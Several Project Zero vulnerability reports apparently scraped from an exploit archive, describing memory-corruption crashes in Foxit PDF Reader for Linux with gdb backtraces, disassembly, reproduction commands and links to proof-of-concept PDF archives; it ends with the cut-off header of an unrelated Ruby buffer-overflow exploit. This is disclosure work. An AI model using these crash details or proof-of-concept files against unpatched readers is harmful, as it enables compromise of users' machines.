#20 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#21 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#22 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#23 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#24 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#25 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#26 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#27 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#28 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#29 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#30 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#31 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#32 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#33 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
---Type <return> to continue, or q <return> to quit---     
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#34 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#35 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#36 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#37 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#38 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#39 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#40 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#41 0x00007ffff74e0973 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#42 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#43 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#44 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#45 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#46 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#47 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#48 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so
#49 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#50 0x00007ffff4a7a048 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#51 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#52 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#53 0x00007ffff633f96b in QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#54 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#55 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe288) at ../../Readerlite/ReaderLite/src/main.cpp:310
(gdb) x/10i $rip
=> 0x7fb462 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+188>:   mov    0x2(%rbp),%dl
   0x7fb465 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+191>:   add    $0x3,%r13
   0x7fb469 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+195>:   add    $0x3,%rbp
   0x7fb46d <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+199>:   inc    %eax
   0x7fb46f <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+201>:   mov    %dl,-0x3(%r13)
   0x7fb473 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+205>:   mov    -0x2(%rbp),%dl
   0x7fb476 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+208>:   mov    %dl,-0x2(%r13)
   0x7fb47a <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+212>:   mov    -0x3(%rbp),%dl
   0x7fb47d <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+215>:   mov    %dl,-0x1(%r13)
   0x7fb481 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+219>:
    jmp    0x7fb459 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+179>
(gdb) info reg $rbp
rbp            0x1a30fff        0x1a30fff
--- cut ---

Attached is a proof of concept PDF file.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39941.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=745

We have identified the following crash due to an invalid read in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:

$ DISPLAY=:1 FoxitReader /path/to/poc/file.pdf

The DISPLAY=:1 environment variable is set because we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too.

An example excerpt from the crash log is as follows:

--- cut ---
Program received signal SIGSEGV, Segmentation fault.
0x0000000000ab467f in CFX_WideString::operator=(CFX_WideString const&) ()
(gdb) where
#0  0x0000000000ab467f in CFX_WideString::operator=(CFX_WideString const&) ()
#1  0x00000000006c53a8 in CRichTextXML::ParseXML2Text(CXML_Element*, CRichTextXML::STYLE*, CRichTextXML::STYLE*) ()
#2  0x00000000006c5357 in CRichTextXML::ParseXML2Text(CXML_Element*, CRichTextXML::STYLE*, CRichTextXML::STYLE*) ()
#3  0x00000000006c5357 in CRichTextXML::ParseXML2Text(CXML_Element*, CRichTextXML::STYLE*, CRichTextXML::STYLE*) ()
#4  0x00000000006c6364 in CRichTextXML::ParseXML2Text() ()
#5  0x00000000006c6a33 in CRichTextXML::SetXML(wchar_t const*, wchar_t const*) ()
#6  0x00000000006c9d49 in CFX_Edit::SetRichTextByXML(wchar_t const*, wchar_t const*, int, int) ()
#7  0x000000000067e995 in CPWL_Note_Contents::SetRichText(CFX_WideString const&) ()
#8  0x000000000067e9e5 in CPWL_NoteItem::SetRichContents(CFX_WideString const&) ()
#9  0x00000000005cbcc7 in CMarkup_Popup::SetNoteContents(CFX_WideString const&, CReader_PageView*) ()
#10 0x00000000005ca0e7 in CMarkup_Popup::InitNote(CReader_PageView*) ()
#11 0x00000000005ca420 in CMarkup_Popup::CreateNote(CReader_PageView*, int) ()
#12 0x00000000005cd578 in CMarkup_Popup::UpdateNote(CReader_PageView*, int) ()
#13 0x00000000005d2475 in CMarkup_AnnotHandler::OnPageVisible(CReader_PageView*, CReader_Annot*) ()
#14 0x00000000006e733e in CTA_AnnotHandler::OnPageVisible(CReader_PageView*, CReader_Annot*) ()
#15 0x0000000000640424 in CBA_PageEventHandler::OnPageVisible(CReader_PageView*) ()
#16 0x0000000000461d1b in CReader_AppEx::OnPageVisible (this=0x14a5120, pDocView=0x19446a0)
    at ../../Readerlite/ReaderLite/src/frd_appex.cpp:2901
#17 0x0000000000450bec in CReader_ViewPage::DoPageVisibleAction (this=0x1944670)
    at ../../Readerlite/ReaderLite/src/preview.cpp:3204
#18 0x000000000044b980 in CPDF_TVPreview::Slot_DoPageVisibleEvent (this=0x1943180)
    at ../../Readerlite/ReaderLite/src/preview.cpp:1443
#19 0x000000000044e333 in CPDFViewerEventHandler::OnFinishRender (this=0x194c520)
    at ../../Readerlite/ReaderLite/src/preview.cpp:2386
#20 0x000000000061db28 in CPDFViewerEx::ContinueRendering() ()
#21 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) ()
#22 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x1943180)
    at ../../Readerlite/ReaderLite/src/preview.cpp:1305
#23 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#24 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#25 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#26 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#27 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#28 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#29 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#30 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#31 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#32 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#33 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#34 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#35 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#36 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
---Type <return> to continue, or q <return> to quit---   
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#37 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#38 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#39 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#40 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#41 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#42 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#43 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#44 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#45 0x00007ffff74e0973 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#46 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#47 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#48 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#49 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#50 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#51 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#52 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so
#53 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#54 0x00007ffff4a7a048 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#55 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#56 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#57 0x00007ffff633f96b in QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#58 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#59 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe298) at ../../Readerlite/ReaderLite/src/main.cpp:310
(gdb) x/10i $rip
=> 0xab467f <_ZN14CFX_WideStringaSERKS_+51>:    cmpq   $0x0,0x0(%r13)
   0xab4684 <_ZN14CFX_WideStringaSERKS_+56>:    js     0xab4692 <_ZN14CFX_WideStringaSERKS_+70>
   0xab4686 <_ZN14CFX_WideStringaSERKS_+58>:    test   %rbp,%rbp
   0xab4689 <_ZN14CFX_WideStringaSERKS_+61>:    je     0xab46a3 <_ZN14CFX_WideStringaSERKS_+87>
   0xab468b <_ZN14CFX_WideStringaSERKS_+63>:    cmpq   $0x0,0x0(%rbp)
   0xab4690 <_ZN14CFX_WideStringaSERKS_+68>:    jns    0xab46a3 <_ZN14CFX_WideStringaSERKS_+87>
   0xab4692 <_ZN14CFX_WideStringaSERKS_+70>:    mov    0x8(%rbp),%esi
   0xab4695 <_ZN14CFX_WideStringaSERKS_+73>:    lea    0x10(%rbp),%rdx
   0xab4699 <_ZN14CFX_WideStringaSERKS_+77>:    mov    %rbx,%rdi
   0xab469c <_ZN14CFX_WideStringaSERKS_+80>:    callq  0xab45a8 <_ZN14CFX_WideString10AssignCopyEiPKw>
(gdb) info reg $r13
r13            0x740000006e     498216206446
--- cut ---

Attached is a proof of concept PDF file.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39942.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=741

We have identified the following memory corruption vulnerability in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:

$ MALLOC_CHECK_=3 DISPLAY=:1 FoxitReader /path/to/poc/file.pdf

The MALLOC_CHECK_=3 environment variable is used to enforce strict checks in the libc memory allocator, while DISPLAY=:1 is set because we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too.

An example excerpt from the crash log is as follows:

--- cut ---
*** Error in `FoxitReader': free(): invalid pointer: 0x0000000001930a60 ***
[New Thread 0x7fffdfa16700 (LWP 26721)]
[New Thread 0x7fffe0217700 (LWP 26720)]
[New Thread 0x7fffe0a18700 (LWP 26718)]
[New Thread 0x7fffe97cd700 (LWP 26717)]

Program received signal SIGABRT, Aborted.
0x00007ffff4fc0cb7 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
56      ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) where
#0  0x00007ffff4fc0cb7 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1  0x00007ffff4fc40a8 in __GI_abort () at abort.c:89
#2  0x00007ffff4ffd2f4 in __libc_message (do_abort=do_abort@entry=1, 
    fmt=fmt@entry=0x7ffff510b988 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175
#3  0x00007ffff500bef6 in malloc_printerr (ptr=<optimized out>, 
    str=0x7ffff5107a79 "free(): invalid pointer", action=1) at malloc.c:4996
#4  free_check (mem=<optimized out>, caller=<optimized out>) at hooks.c:298
#5  0x00000000007c823f in CPDF_StreamContentParser::~CPDF_StreamContentParser() ()
#6  0x00000000007c9504 in CPDF_ContentParser::Continue(IFX_Pause*, int) ()
#7  0x00000000007b97d9 in CPDF_PageObjects::ContinueParse(IFX_Pause*) ()
#8  0x000000000047a8b4 in CReader_PageEx::ParsePage (this=0x191f7e0)
    at ../../Readerlite/ReaderLite/src/frd_pageex.cpp:792
#9  0x0000000000490415 in CPDFViewerContentProvider::ParsePage (this=0x191ea60, nPage=0)
    at ../../Readerlite/ReaderLite/src/pdfviewercontentprovider.cpp:23
#10 0x000000000061da5f in CPDFViewerEx::DrawPages(CFX_DIBitmap*) ()
#11 0x000000000061daa8 in CPDFViewerEx::Paint(CFX_DIBitmap*) ()
#12 0x000000000061daf1 in CPDFViewerEx::ContinueRendering() ()
#13 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) ()
#14 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x191efe0)
    at ../../Readerlite/ReaderLite/src/preview.cpp:1305
#15 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#16 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#17 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#18 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#19 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#20 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#21 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#22 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#23 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#24 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#25 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#26 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#27 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#28 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#29 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#30 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#31 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#32 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
---Type <return> to continue, or q <return> to quit---
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#33 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#34 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#35 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#36 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#37 0x00007ffff74e0973 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#38 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#39 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#40 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#41 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#42 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#43 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#44 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so
#45 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#46 0x00007ffff4a7a048 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#47 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#48 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#49 0x00007ffff633f96b in QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#50 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#51 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe288) at ../../Readerlite/ReaderLite/src/main.cpp:310
--- cut ---

Attached are six proof of concept PDF files: three derived from an original file named 172.pdf in our original corpus, and three derived from 5659.pdf. While the two groups of files generate crashes with slightly different stack traces, the overall symptoms are similar enough to assume they expose the same bug in the code.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39940.zip
            
#!/bin/ruby
# Exploit Title: iSQL(RL) 1.0 - Buffer Overflow(isql_main.c)
# Date: 2016-06-13
# Exploit Author: HaHwul
